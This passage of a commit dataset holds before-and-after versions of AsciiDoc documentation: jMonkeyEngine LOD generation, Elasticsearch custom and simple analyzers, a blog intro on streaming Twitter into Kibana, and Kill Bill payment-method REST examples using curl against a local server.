SceneComposer.\n====\n\n\n\nimage::jme3\/advanced\/jme-sdk-generate-lod-full.png[jme-sdk-generate-lod-full.png,width=\"\",height=\"\",align=\"center\"]\n\n\n\n=== Generating LODs in Code\n\nThe `jme3tools.optimize.LodGenerator` utility class helps you generate LODs for an arbitrary mesh (a Geometry object) programmatically from your Java code. You create and bake one LodGenerator for each Geometry.\n\n[source,java]\n----\nLodGenerator lod = new LodGenerator(geometry);\nlod.bakeLods(reductionMethod,reductionValue);\n----\n\nThe LODs are stored inside the Geometry object.\n\n*Example:* How to generate an LOD of myPrettyGeo's mesh with the same settings as used in the SDK example above:\n\n[source,java]\n----\nLodGenerator lod = new LodGenerator(myPrettyGeo);\nlod.bakeLods(LodGenerator.TriangleReductionMethod.PROPORTIONAL,0.25, 0.5f, 0.75f);\n----\n\n\n== Activate the LOD Control\n\nAfter generating the LODs for the geometry, you create and add a `com.jme3.scene.control.LodControl` to the geometry. Adding the LodControl activates the LOD optimizaton for this geometry.\n\n[source,java]\n----\nLodControl lc = new LodControl();\nmyPrettyGeo.addControl(lc);\nrootNode.attachChild(myPrettyGeo);\n----\n\nThe LodControl internally gets the camera from the game's viewport to calculate the distance to this geometry. Depending on the distance, the LodControl selects an appropriate level of detail, and passes more (or less) detailed vertex data to the renderer.\n\n\n== Impact on Quality and Speed\n[cols=\"10,30,20,20,20\", options=\"header\"]\n|===\n\na|Level number\na|Purpose\na|Distance\na|Rendering Speed\na|Rendering Quality\n\na|Level 0\na|The original mesh is used automatically for close-ups, and it's the default if no LODs have been generated.\na|Closest\na|Slowest.\na|Best.\n\na|Level 1 +\nLevel 2 +\nLevel 3\na|If you generated LODs, JME3 uses them automatically as soon as the object moves into the background.\na|The higher the level, +\nthe further away.\na|The higher the level, +\nthe faster.\na|The higher the level, +\nthe lower the quality.\n\n|===\n\n\n== See also\n\n* link:https:\/\/hub.jmonkeyengine.org\/t\/brand-new-lod-generator\/26341[https:\/\/hub.jmonkeyengine.org\/t\/brand-new-lod-generator\/26341]\n* link:https:\/\/github.com\/worldforge\/ember\/tree\/master\/src\/components\/ogre\/lod[https:\/\/github.com\/worldforge\/ember\/tree\/master\/src\/components\/ogre\/lod]\n* link:http:\/\/www.melax.com\/polychop[http:\/\/www.melax.com\/polychop]\n* link:http:\/\/sajty.elementfx.com\/progressivemesh\/GSoC2012.pdf[http:\/\/sajty.elementfx.com\/progressivemesh\/GSoC2012.pdf]\n* <<jme3\/advanced\/terrain#,JME3 TerraMonkey Terrain>>\n","returncode":0,"stderr":"","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"d7d91085ce04ccc65dc638af0228500c6f6993f6","subject":"[DOCS] Correct custom analyzer callouts (#46030)","message":"[DOCS] Correct custom analyzer callouts (#46030)\n\n","repos":"vroyer\/elassandra,vroyer\/elassandra,strapdata\/elassandra,vroyer\/elassandra,strapdata\/elassandra,strapdata\/elassandra,strapdata\/elassandra,strapdata\/elassandra","old_file":"docs\/reference\/analysis\/analyzers\/custom-analyzer.asciidoc","new_file":"docs\/reference\/analysis\/analyzers\/custom-analyzer.asciidoc","new_contents":"[[analysis-custom-analyzer]]\n=== Custom Analyzer\n\nWhen the built-in analyzers do not fulfill your needs, you can create a\n`custom` analyzer which uses the appropriate combination of:\n\n* zero or more <<analysis-charfilters, character filters>>\n* a <<analysis-tokenizers,tokenizer>>\n* zero or more <<analysis-tokenfilters,token filters>>.\n\n[float]\n=== Configuration\n\nThe `custom` analyzer accepts the following parameters:\n\n[horizontal]\n`tokenizer`::\n\n A built-in or customised <<analysis-tokenizers,tokenizer>>.\n (Required)\n\n`char_filter`::\n\n An optional array of built-in or customised\n <<analysis-charfilters, character filters>>.\n\n`filter`::\n\n An optional array of built-in or customised\n <<analysis-tokenfilters, token filters>>.\n\n`position_increment_gap`::\n\n When indexing an array of text values, Elasticsearch inserts a fake \"gap\"\n between the last term of one value and the first term of the next value to\n ensure that a phrase query doesn't match two terms from different array\n elements. Defaults to `100`. See <<position-increment-gap>> for more.\n\n[float]\n=== Example configuration\n\nHere is an example that combines the following:\n\nCharacter Filter::\n* <<analysis-htmlstrip-charfilter,HTML Strip Character Filter>>\n\nTokenizer::\n* <<analysis-standard-tokenizer,Standard Tokenizer>>\n\nToken Filters::\n* <<analysis-lowercase-tokenfilter,Lowercase Token Filter>>\n* <<analysis-asciifolding-tokenfilter,ASCII-Folding Token Filter>>\n\n[source,js]\n--------------------------------\nPUT my_index\n{\n \"settings\": {\n \"analysis\": {\n \"analyzer\": {\n \"my_custom_analyzer\": {\n \"type\": \"custom\", <1>\n \"tokenizer\": \"standard\",\n \"char_filter\": [\n \"html_strip\"\n ],\n \"filter\": [\n \"lowercase\",\n \"asciifolding\"\n ]\n }\n }\n }\n }\n}\n\nPOST my_index\/_analyze\n{\n \"analyzer\": \"my_custom_analyzer\",\n \"text\": \"Is this <b>d\u00e9j\u00e0 vu<\/b>?\"\n}\n--------------------------------\n\/\/ CONSOLE\n\n<1> Setting `type` to `custom` tells Elasticsearch that we are defining a custom analyzer.\n Compare this to how <<configuring-analyzers,built-in analyzers can be configured>>:\n `type` will be set to the name of the built-in analyzer, like\n <<analysis-standard-analyzer,`standard`>> or <<analysis-simple-analyzer,`simple`>>.\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\n[source,js]\n----------------------------\n{\n \"tokens\": [\n {\n \"token\": \"is\",\n \"start_offset\": 0,\n \"end_offset\": 2,\n \"type\": \"<ALPHANUM>\",\n \"position\": 0\n },\n {\n \"token\": \"this\",\n \"start_offset\": 3,\n \"end_offset\": 7,\n \"type\": \"<ALPHANUM>\",\n \"position\": 1\n },\n {\n \"token\": \"deja\",\n \"start_offset\": 11,\n \"end_offset\": 15,\n \"type\": \"<ALPHANUM>\",\n \"position\": 2\n },\n {\n \"token\": \"vu\",\n \"start_offset\": 16,\n \"end_offset\": 22,\n \"type\": \"<ALPHANUM>\",\n \"position\": 3\n }\n ]\n}\n----------------------------\n\/\/ TESTRESPONSE\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\n\nThe above example produces the following terms:\n\n[source,text]\n---------------------------\n[ is, this, deja, vu ]\n---------------------------\n\nThe previous example used tokenizer, token filters, and character filters with\ntheir default configurations, but it is possible to create configured versions\nof each and to use them in a custom analyzer.\n\nHere is a more complicated example that combines the following:\n\nCharacter Filter::\n* <<analysis-mapping-charfilter,Mapping Character Filter>>, configured to replace `:)` with `_happy_` and `:(` with `_sad_`\n\nTokenizer::\n* <<analysis-pattern-tokenizer,Pattern Tokenizer>>, configured to split on punctuation characters\n\nToken Filters::\n* <<analysis-lowercase-tokenfilter,Lowercase Token Filter>>\n* <<analysis-stop-tokenfilter,Stop Token Filter>>, configured to use the pre-defined list of English stop words\n\n\nHere is an example:\n\n[source,js]\n--------------------------------------------------\nPUT my_index\n{\n \"settings\": {\n \"analysis\": {\n \"analyzer\": {\n \"my_custom_analyzer\": { <1>\n \"type\": \"custom\",\n \"char_filter\": [\n \"emoticons\"\n ],\n \"tokenizer\": \"punctuation\",\n \"filter\": [\n \"lowercase\",\n \"english_stop\"\n ]\n }\n },\n \"tokenizer\": {\n \"punctuation\": { <2>\n \"type\": \"pattern\",\n \"pattern\": \"[ .,!?]\"\n }\n },\n \"char_filter\": {\n \"emoticons\": { <3>\n \"type\": \"mapping\",\n \"mappings\": [\n \":) => _happy_\",\n \":( => _sad_\"\n ]\n }\n },\n \"filter\": {\n \"english_stop\": { <4>\n \"type\": \"stop\",\n \"stopwords\": \"_english_\"\n }\n }\n }\n }\n}\n\nPOST my_index\/_analyze\n{\n \"analyzer\": \"my_custom_analyzer\",\n \"text\": \"I'm a :) person, and you?\"\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n<1> Assigns the index a default custom analyzer, `my_custom_analyzer`. This\nanalyzer uses a custom tokenizer, character filter, and token filter that\nare defined later in the request.\n<2> Defines the custom `punctuation` tokenizer.\n<3> Defines the custom `emoticons` character filter.\n<4> Defines the custom `english_stop` token filter.\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\n[source,js]\n----------------------------\n{\n \"tokens\": [\n {\n \"token\": \"i'm\",\n \"start_offset\": 0,\n \"end_offset\": 3,\n \"type\": \"word\",\n \"position\": 0\n },\n {\n \"token\": \"_happy_\",\n \"start_offset\": 6,\n \"end_offset\": 8,\n \"type\": \"word\",\n \"position\": 2\n },\n {\n \"token\": \"person\",\n \"start_offset\": 9,\n \"end_offset\": 15,\n \"type\": \"word\",\n \"position\": 3\n },\n {\n \"token\": \"you\",\n \"start_offset\": 21,\n \"end_offset\": 24,\n \"type\": \"word\",\n \"position\": 5\n }\n ]\n}\n----------------------------\n\/\/ TESTRESPONSE\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\n\nThe above example produces the following terms:\n\n[source,text]\n---------------------------\n[ i'm, _happy_, person, you ]\n---------------------------\n","old_contents":"[[analysis-custom-analyzer]]\n=== Custom Analyzer\n\nWhen the built-in analyzers do not fulfill your needs, you can create a\n`custom` analyzer which uses the appropriate combination of:\n\n* zero or more <<analysis-charfilters, character filters>>\n* a <<analysis-tokenizers,tokenizer>>\n* zero or more <<analysis-tokenfilters,token filters>>.\n\n[float]\n=== Configuration\n\nThe `custom` analyzer accepts the following parameters:\n\n[horizontal]\n`tokenizer`::\n\n A built-in or customised <<analysis-tokenizers,tokenizer>>.\n (Required)\n\n`char_filter`::\n\n An optional array of built-in or customised\n <<analysis-charfilters, character filters>>.\n\n`filter`::\n\n An optional array of built-in or customised\n <<analysis-tokenfilters, token filters>>.\n\n`position_increment_gap`::\n\n When indexing an array of text values, Elasticsearch inserts a fake \"gap\"\n between the last term of one value and the first term of the next value to\n ensure that a phrase query doesn't match two terms from different array\n elements. Defaults to `100`. See <<position-increment-gap>> for more.\n\n[float]\n=== Example configuration\n\nHere is an example that combines the following:\n\nCharacter Filter::\n* <<analysis-htmlstrip-charfilter,HTML Strip Character Filter>>\n\nTokenizer::\n* <<analysis-standard-tokenizer,Standard Tokenizer>>\n\nToken Filters::\n* <<analysis-lowercase-tokenfilter,Lowercase Token Filter>>\n* <<analysis-asciifolding-tokenfilter,ASCII-Folding Token Filter>>\n\n[source,js]\n--------------------------------\nPUT my_index\n{\n \"settings\": {\n \"analysis\": {\n \"analyzer\": {\n \"my_custom_analyzer\": {\n \"type\": \"custom\", <1>\n \"tokenizer\": \"standard\",\n \"char_filter\": [\n \"html_strip\"\n ],\n \"filter\": [\n \"lowercase\",\n \"asciifolding\"\n ]\n }\n }\n }\n }\n}\n\nPOST my_index\/_analyze\n{\n \"analyzer\": \"my_custom_analyzer\",\n \"text\": \"Is this <b>d\u00e9j\u00e0 vu<\/b>?\"\n}\n--------------------------------\n\/\/ CONSOLE\n\n<1> Setting `type` to `custom` tells Elasticsearch that we are defining a custom analyzer.\n Compare this to how <<configuring-analyzers,built-in analyzers can be configured>>:\n `type` will be set to the name of the built-in analyzer, like\n <<analysis-standard-analyzer,`standard`>> or <<analysis-simple-analyzer,`simple`>>.\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\n[source,js]\n----------------------------\n{\n \"tokens\": [\n {\n \"token\": \"is\",\n \"start_offset\": 0,\n \"end_offset\": 2,\n \"type\": \"<ALPHANUM>\",\n \"position\": 0\n },\n {\n \"token\": \"this\",\n \"start_offset\": 3,\n \"end_offset\": 7,\n \"type\": \"<ALPHANUM>\",\n \"position\": 1\n },\n {\n \"token\": \"deja\",\n \"start_offset\": 11,\n \"end_offset\": 15,\n \"type\": \"<ALPHANUM>\",\n \"position\": 2\n },\n {\n \"token\": \"vu\",\n \"start_offset\": 16,\n \"end_offset\": 22,\n \"type\": \"<ALPHANUM>\",\n \"position\": 3\n }\n ]\n}\n----------------------------\n\/\/ TESTRESPONSE\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\n\nThe above example produces the following terms:\n\n[source,text]\n---------------------------\n[ is, this, deja, vu ]\n---------------------------\n\nThe previous example used tokenizer, token filters, and character filters with\ntheir default configurations, but it is possible to create configured versions\nof each and to use them in a custom analyzer.\n\nHere is a more complicated example that combines the following:\n\nCharacter Filter::\n* <<analysis-mapping-charfilter,Mapping Character Filter>>, configured to replace `:)` with `_happy_` and `:(` with `_sad_`\n\nTokenizer::\n* <<analysis-pattern-tokenizer,Pattern Tokenizer>>, configured to split on punctuation characters\n\nToken Filters::\n* <<analysis-lowercase-tokenfilter,Lowercase Token Filter>>\n* <<analysis-stop-tokenfilter,Stop Token Filter>>, configured to use the pre-defined list of English stop words\n\n\nHere is an example:\n\n[source,js]\n--------------------------------------------------\nPUT my_index\n{\n \"settings\": {\n \"analysis\": {\n \"analyzer\": {\n \"my_custom_analyzer\": {\n \"type\": \"custom\",\n \"char_filter\": [\n \"emoticons\" <1>\n ],\n \"tokenizer\": \"punctuation\", <1>\n \"filter\": [\n \"lowercase\",\n \"english_stop\" <1>\n ]\n }\n },\n \"tokenizer\": {\n \"punctuation\": { <1>\n \"type\": \"pattern\",\n \"pattern\": \"[ .,!?]\"\n }\n },\n \"char_filter\": {\n \"emoticons\": { <1>\n \"type\": \"mapping\",\n \"mappings\": [\n \":) => _happy_\",\n \":( => _sad_\"\n ]\n }\n },\n \"filter\": {\n \"english_stop\": { <1>\n \"type\": \"stop\",\n \"stopwords\": \"_english_\"\n }\n }\n }\n }\n}\n\nPOST my_index\/_analyze\n{\n \"analyzer\": \"my_custom_analyzer\",\n \"text\": \"I'm a :) person, and you?\"\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n<1> The `emoticons` character filter, `punctuation` tokenizer and\n `english_stop` token filter are custom implementations which are defined\n in the same index settings.\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\n[source,js]\n----------------------------\n{\n \"tokens\": [\n {\n \"token\": \"i'm\",\n \"start_offset\": 0,\n \"end_offset\": 3,\n \"type\": \"word\",\n \"position\": 0\n },\n {\n \"token\": \"_happy_\",\n \"start_offset\": 6,\n \"end_offset\": 8,\n \"type\": \"word\",\n \"position\": 2\n },\n {\n \"token\": \"person\",\n \"start_offset\": 9,\n \"end_offset\": 15,\n \"type\": \"word\",\n \"position\": 3\n },\n {\n \"token\": \"you\",\n \"start_offset\": 21,\n \"end_offset\": 24,\n \"type\": \"word\",\n \"position\": 5\n }\n ]\n}\n----------------------------\n\/\/ TESTRESPONSE\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\n\nThe above example produces the following terms:\n\n[source,text]\n---------------------------\n[ i'm, _happy_, person, you ]\n---------------------------\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f47886e44a1448ab1ff9b0bf25364a567513af48","subject":"[DOCS] Modified section headings, edited text for clarity. (#44988)","message":"[DOCS] Modified section headings, edited text for clarity. (#44988)\n\n* [DOCS] Modified section headings, edited text for clarity.\r\n\r\n* [DOCS] Modified section headings, edited text for clarity.\r\n\r\n* [DOCS] Modified section headings, edited text for clarity.\r\n","repos":"uschindler\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch","old_file":"docs\/reference\/analysis\/analyzers\/simple-analyzer.asciidoc","new_file":"docs\/reference\/analysis\/analyzers\/simple-analyzer.asciidoc","new_contents":"[[analysis-simple-analyzer]]\n=== Simple Analyzer\n\nThe `simple` analyzer breaks text into terms at any non-letter character, such\nas numbers, spaces, hyphens and apostrophes, discards non-letter characters, \nand changes uppercase to lowercase.\n\n==== Example\n\n[source,js]\n---------------------------\nPOST _analyze\n{\n \"analyzer\": \"simple\",\n \"text\": \"The 2 QUICK Brown-Foxes jumped over the lazy dog's bone.\"\n}\n---------------------------\n\/\/ CONSOLE\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\n[source,js]\n----------------------------\n{\n \"tokens\": [\n {\n \"token\": \"the\",\n \"start_offset\": 0,\n \"end_offset\": 3,\n \"type\": \"word\",\n \"position\": 0\n },\n {\n \"token\": \"quick\",\n \"start_offset\": 6,\n \"end_offset\": 11,\n \"type\": \"word\",\n \"position\": 1\n },\n {\n \"token\": \"brown\",\n \"start_offset\": 12,\n \"end_offset\": 17,\n \"type\": \"word\",\n \"position\": 2\n },\n {\n \"token\": \"foxes\",\n \"start_offset\": 18,\n \"end_offset\": 23,\n \"type\": \"word\",\n \"position\": 3\n },\n {\n \"token\": \"jumped\",\n \"start_offset\": 24,\n \"end_offset\": 30,\n \"type\": \"word\",\n \"position\": 4\n },\n {\n \"token\": \"over\",\n \"start_offset\": 31,\n \"end_offset\": 35,\n \"type\": \"word\",\n \"position\": 5\n },\n {\n \"token\": \"the\",\n \"start_offset\": 36,\n \"end_offset\": 39,\n \"type\": \"word\",\n \"position\": 6\n },\n {\n \"token\": \"lazy\",\n \"start_offset\": 40,\n \"end_offset\": 44,\n \"type\": \"word\",\n \"position\": 7\n },\n {\n \"token\": \"dog\",\n \"start_offset\": 45,\n \"end_offset\": 48,\n \"type\": \"word\",\n \"position\": 8\n },\n {\n \"token\": \"s\",\n \"start_offset\": 49,\n \"end_offset\": 50,\n \"type\": \"word\",\n \"position\": 9\n },\n {\n \"token\": \"bone\",\n \"start_offset\": 51,\n \"end_offset\": 55,\n \"type\": \"word\",\n \"position\": 10\n }\n ]\n}\n----------------------------\n\/\/ TESTRESPONSE\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\n\nThe `simple` analyzer parses the sentence and produces the following \nterms: \n\n[source,text]\n---------------------------\n[ the, quick, brown, foxes, jumped, over, the, lazy, dog, s, bone ]\n---------------------------\n\n==== Configure parameters\n\nThe `simple` analyzer does not contain configurable parameters. \n\n==== Customize\n\nThe `simple` analyzer is defined by one tokenizer:\n\nTokenizer::\n* <<analysis-lowercase-tokenizer,Lower Case Tokenizer>>\n\nTo customize the `simple` analyzer, duplicate it to create the basis for \na `custom` analyzer. The new analyzer can be modified as required, usually by \nadding token filters.\n\n===== Example\n\n[source,js]\n----------------------------------------------------\nPUT \/simple_example\n{\n \"settings\": {\n \"analysis\": {\n \"analyzer\": {\n \"rebuilt_simple\": {\n \"tokenizer\": \"lowercase\",\n \"filter\": [ <1>\n ]\n }\n }\n }\n }\n}\n----------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[s\/\\n$\/\\nstartyaml\\n - compare_analyzers: {index: simple_example, first: simple, second: rebuilt_simple}\\nendyaml\\n\/]\n<1> Add token filters here.\n","old_contents":"[[analysis-simple-analyzer]]\n=== Simple Analyzer\n\nThe `simple` analyzer breaks text into terms whenever it encounters a\ncharacter which is not a letter. All terms are lower cased.\n\n[float]\n=== Example output\n\n[source,js]\n---------------------------\nPOST _analyze\n{\n \"analyzer\": \"simple\",\n \"text\": \"The 2 QUICK Brown-Foxes jumped over the lazy dog's bone.\"\n}\n---------------------------\n\/\/ CONSOLE\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\n[source,js]\n----------------------------\n{\n \"tokens\": [\n {\n \"token\": \"the\",\n \"start_offset\": 0,\n \"end_offset\": 3,\n \"type\": \"word\",\n \"position\": 0\n },\n {\n \"token\": \"quick\",\n \"start_offset\": 6,\n \"end_offset\": 11,\n \"type\": \"word\",\n \"position\": 1\n },\n {\n \"token\": \"brown\",\n \"start_offset\": 12,\n \"end_offset\": 17,\n \"type\": \"word\",\n \"position\": 2\n },\n {\n \"token\": \"foxes\",\n \"start_offset\": 18,\n \"end_offset\": 23,\n \"type\": \"word\",\n \"position\": 3\n },\n {\n \"token\": \"jumped\",\n \"start_offset\": 24,\n \"end_offset\": 30,\n \"type\": \"word\",\n \"position\": 4\n },\n {\n \"token\": \"over\",\n \"start_offset\": 31,\n \"end_offset\": 35,\n \"type\": \"word\",\n \"position\": 5\n },\n {\n \"token\": \"the\",\n \"start_offset\": 36,\n \"end_offset\": 39,\n \"type\": \"word\",\n \"position\": 6\n },\n {\n \"token\": \"lazy\",\n \"start_offset\": 40,\n \"end_offset\": 44,\n \"type\": \"word\",\n \"position\": 7\n },\n {\n \"token\": \"dog\",\n \"start_offset\": 45,\n \"end_offset\": 48,\n \"type\": \"word\",\n \"position\": 8\n },\n {\n \"token\": \"s\",\n \"start_offset\": 49,\n \"end_offset\": 50,\n \"type\": \"word\",\n \"position\": 9\n },\n {\n \"token\": \"bone\",\n \"start_offset\": 51,\n \"end_offset\": 55,\n \"type\": \"word\",\n \"position\": 10\n }\n ]\n}\n----------------------------\n\/\/ TESTRESPONSE\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\n\nThe above sentence would produce the following terms:\n\n[source,text]\n---------------------------\n[ the, quick, brown, foxes, jumped, over, the, lazy, dog, s, bone ]\n---------------------------\n\n[float]\n=== Configuration\n\nThe `simple` analyzer is not configurable.\n\n[float]\n=== Definition\n\nThe `simple` analzyer consists of:\n\nTokenizer::\n* <<analysis-lowercase-tokenizer,Lower Case Tokenizer>>\n\nIf you need to customize the `simple` analyzer then you need to recreate\nit as a `custom` analyzer and modify it, usually by adding token filters.\nThis would recreate the built-in `simple` analyzer and you can use it as\na starting point for further customization:\n\n[source,js]\n----------------------------------------------------\nPUT \/simple_example\n{\n \"settings\": {\n \"analysis\": {\n \"analyzer\": {\n \"rebuilt_simple\": {\n \"tokenizer\": \"lowercase\",\n \"filter\": [ <1>\n ]\n }\n }\n }\n }\n}\n----------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[s\/\\n$\/\\nstartyaml\\n - compare_analyzers: {index: simple_example, first: simple, second: rebuilt_simple}\\nendyaml\\n\/]\n<1> You'd add any token filters here.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"64b4929d5620dbd79309520adf7b7d69665428f0","subject":"Update 2015-05-24-Livestreaming-twitter-updates-into-Kibana-using-Firehose-and-RabbitMQ.adoc","message":"Update 2015-05-24-Livestreaming-twitter-updates-into-Kibana-using-Firehose-and-RabbitMQ.adoc","repos":"rvegas\/rvegas.github.io,rvegas\/rvegas.github.io,rvegas\/rvegas.github.io","old_file":"_posts\/2015-05-24-Livestreaming-twitter-updates-into-Kibana-using-Firehose-and-RabbitMQ.adoc","new_file":"_posts\/2015-05-24-Livestreaming-twitter-updates-into-Kibana-using-Firehose-and-RabbitMQ.adoc","new_contents":"# Livestreaming twitter updates into Kibana using Firehose and RabbitMQ\n\n:hp-tags: twitter, kibana, elasticsearch, php\n\nLast time I wrote a small guide or actually a log of what it took me to build a elasticsearch cluster using vagrant and puphet. Since then I've been working some more with elasticsearch and discovered link:https:\/\/www.elastic.co\/products\/kibana[Kibana] and wow isn't that something cool!?\n\n*Kibana* is a visualization tool that is architected to work with *elasticsearch*, it can also load data from many other sources and it has many many features just like elasticsearch does.\n\nI decided then to put up a small experiment by reading *Twitter* status updates and dumping them into a elastic search collection so I could later build some graphs based on the characteristics of the tweets (language, sentiment, place, brand, user, whatever I could get).\n\n## Kibana, RabbitMQ, Firehose???\n\n","old_contents":"# Livestreaming twitter updates into Kibana using Firehose and RabbitMQ\n\n:hp-tags: twitter, kibana, elasticsearch, php\n\nLast time I wrote a small guide or actually a log of what it took me to build a elasticsearch cluster using vagrant and puphet. Since then I've been working some more with elasticsearch and discovered link:https:\/\/www.elastic.co\/products\/kibana[Kibana] and wow isn't that something cool!?\n\n*Kibana* is a visualization tool that is architected to work with *elasticsearch*, it can also load data from many other sources and it has many many features just like elasticsearch does.\n\nI decided then to put up a small experiment by reading *Twitter* status updates and dumping them into a elastic search collection so I could later build some graphs based on the characteristics of the tweets (language, sentiment, place, brand, user, whatever I could get).","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"ff17b3b3bb238a3659aedda6c47b1f74a7ed3909","subject":"Removed outdated information","message":"Removed outdated information","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/payment\/includes\/payment-method-apis.adoc","new_file":"userguide\/payment\/includes\/payment-method-apis.adoc","new_contents":"The first step when registering payment methods is to create an account in Kill Bill. This needs to be done once:\n\n[source,bash]\n----\ncurl -v \\\n -X POST \\\n -u admin:password \\\n -H 'Content-Type: application\/json' \\\n -H 'X-Killbill-ApiKey:bob' \\\n -H 'X-Killbill-ApiSecret:lazar' \\\n -H 'X-Killbill-CreatedBy: creator' \\\n --data-binary '{\"name\":\"john\",\"email\":\"john@foo.com\",\"currency\":\"USD\"}' \\\n \"http:\/\/127.0.0.1:8080\/1.0\/kb\/accounts\"\n----\n\nThis call will return a 201 Location header containing the id associated with the newly created account. The rest of this document will assume this id is `268983f2-5443-47e4-a967-b8962fc699c5`, make sure to update your commands accordingly.\n\nTo add a payment method, POST the following information:\n\n[source,bash]\n----\ncurl -v \\\n -X POST \\\n -u admin:password \\\n -H 'Content-Type: application\/json' \\\n -H 'X-Killbill-ApiKey:bob' \\\n -H 'X-Killbill-ApiSecret:lazar' \\\n -H 'X-Killbill-CreatedBy: creator' \\\n --data-binary '{\"pluginName\":\"__EXTERNAL_PAYMENT__\",\"pluginInfo\":{}}' \\\n \"http:\/\/127.0.0.1:8080\/1.0\/kb\/accounts\/268983f2-5443-47e4-a967-b8962fc699c5\/paymentMethods?isDefault=true\"\n----\n\nThis will create a default payment method associated with our account and the __EXTERNAL_PAYMENT__ plugin. *The `pluginInfo` fields are specific to the plugin* and can be seen as a contract between the client of the API and the plugin itself (opaque to Kill Bill). For example, to add a payment method corresponding to Stripe via a token, the https:\/\/github.com\/killbill\/killbill-stripe-plugin[Stripe plugin] expects a field named `token`, with the value of the https:\/\/stripe.com\/docs\/api\/tokens[Stripe token].\n\n[source,bash]\n----\ncurl -v \\\n -X POST \\\n -u admin:password \\\n -H 'Content-Type: application\/json' \\\n -H 'X-Killbill-ApiKey:bob' \\\n -H 'X-Killbill-ApiSecret:lazar' \\\n -H 'X-Killbill-CreatedBy: creator' \\\n --data-binary '{\n \"pluginName\": \"killbill-paypal-express\",\n \"pluginInfo\": {\n \"properties\": [{\n \"key\": \"token\",\n \"value\": \"20G53990M6953444J\"\n }]\n }\n }' \\\n \"http:\/\/127.0.0.1:8080\/1.0\/kb\/accounts\/268983f2-5443-47e4-a967-b8962fc699c5\/paymentMethods?isDefault=true\"\n----\n\nCheck our https:\/\/github.com\/killbill\/killbill-stripe-demo[Stripe demo] for an implementation example.\n\nYou can add as many payment methods as needed to a given account (across one or multiple plugins). You can specify for each payment call the payment method to use, or leave it blank to use the default.\n\nEach payment method in Kill Bill has a unique uuid associated to it. Use this uuid to change the default payment method on the account (in this example, the payment method id `a91161b0-d159-11e3-9c1a-0800200c9a66` becomes the default one):\n\n\n[source,bash]\n----\ncurl -v \\\n -X PUT \\\n -u admin:password \\\n -H 'Content-Type: application\/json' \\\n -H 'X-Killbill-ApiKey:bob' \\\n -H 'X-Killbill-ApiSecret:lazar' \\\n -H 'X-Killbill-CreatedBy: creator' \\\n \"http:\/\/127.0.0.1:8080\/1.0\/kb\/accounts\/268983f2-5443-47e4-a967-b8962fc699c5\/paymentMethods\/a91161b0-d159-11e3-9c1a-0800200c9a66\/setDefault\"\n----\n\n\nTo get information on a payment method, use the following endpoint:\n\n[source,bash]\n----\ncurl -v \\\n -u admin:password \\\n -H 'X-Killbill-ApiKey:bob' \\\n -H 'X-Killbill-ApiSecret:lazar' \\\n \"http:\/\/127.0.0.1:8080\/1.0\/kb\/paymentMethods\/a91161b0-d159-11e3-9c1a-0800200c9a66?withPluginInfo=true\"\n----\n\nThe `withPluginInfo` query parameter tells Kill Bill to fetch plugin specific properties. These properties are custom key\/value pairs the plugin knows about the payment method, that are specific to that payment method.\n\n\nTo delete a payment method:\n\n[source,bash]\n----\ncurl -v \\\n -X DELETE \\\n -u admin:password \\\n -H 'Content-Type: application\/json' \\\n -H 'X-Killbill-ApiKey:bob' \\\n -H 'X-Killbill-ApiSecret:lazar' \\\n -H 'X-Killbill-CreatedBy: creator' \\\n \"http:\/\/127.0.0.1:8080\/1.0\/kb\/paymentMethods\/a91161b0-d159-11e3-9c1a-0800200c9a66\"\n----\n\nThe payment method will be marked as inactive in Kill Bill. The actual deletion of the information is plugin specific (delete the information in the gateway, etc.).\n\nNote that by default you cannot delete the default payment method on an account (because it is assumed to be used for recurring payments). If you really want to delete it though, you can pass the query parameter deleteDefaultPmWithAutoPayOff=true to the previous call. This will delete it and set the account in AUTO_PAY_OFF (invoices won't be paid automatically anymore).\n","old_contents":"The first step when registering 